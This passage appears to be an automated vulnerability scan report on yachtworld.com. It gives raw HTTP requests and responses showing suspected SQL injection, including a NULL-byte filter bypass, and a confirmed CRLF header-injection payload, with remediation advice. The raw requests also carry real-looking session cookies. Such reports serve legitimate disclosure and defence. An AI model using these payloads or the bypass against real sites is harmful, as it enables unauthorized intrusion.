Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
xserver: www663
Content-Length: 0
Content-Type: text/html


1.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [VIEWED_BOATS_STORE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The VIEWED_BOATS_STORE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the VIEWED_BOATS_STORE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00'; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 20:02:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00''; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:16 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

1.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [primary_photo_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The primary_photo_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the primary_photo_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30'&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30''&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

2. HTTP header injection  previous  next
There are 13 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/Power/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 78c71%0d%0a9de75d3bc43 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/78c71%0d%0a9de75d3bc43/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; 